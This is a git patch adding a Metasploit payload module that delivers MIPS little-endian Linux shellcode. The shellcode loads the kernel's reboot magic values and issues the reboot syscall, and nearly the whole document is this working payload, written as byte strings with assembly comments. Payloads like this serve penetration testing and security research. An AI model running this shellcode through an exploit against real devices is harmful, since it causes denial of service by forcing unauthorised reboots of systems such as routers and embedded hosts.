From d6b28e3b74c41e1a04e01161205d562aba706d6c Mon Sep 17 00:00:00 2001 From: Michael Messner Date: Wed, 26 Feb 2014 20:34:35 +0100 Subject: [PATCH] mipsel reboot payload --- .../payloads/singles/linux/mipsle/reboot.rb | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 modules/payloads/singles/linux/mipsle/reboot.rb diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb new file mode 100644 index 0000000000..c7a84ccb69 --- /dev/null +++ b/modules/payloads/singles/linux/mipsle/reboot.rb @@ -0,0 +1,52 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux reboot payload', + 'Description' => %q{ + A very small shellcode for rebooting the system. + This payload is sometimes helpfull for testing purposes. + }, + 'Author' => + [ + 'Michael Messner ', #metasploit payload + 'rigan - ' #original payload + ], + 'References' => ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php'], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'Payload' => + { + 'Offsets' => {} , + 'Payload' => '' + }) + ) + end + + def generate + + shellcode = + "\x21\x43\x06\x3c" + #lui a2,0x4321 + "\xdc\xfe\xc6\x34" + #ori a2,a2,0xfedc + "\x12\x28\x05\x3c" + #lui a1,0x2812 + "\x69\x19\xa5\x34" + #ori a1,a1,0x1969 + "\xe1\xfe\x04\x3c" + #lui a0,0xfee1 + "\xad\xde\x84\x34" + #ori a0,a0,0xdead + "\xf8\x0f\x02\x24" + #li v0,4088 + "\x0c\x01\x01\x01" #syscall 0x40404 + + return super + shellcode + end + +end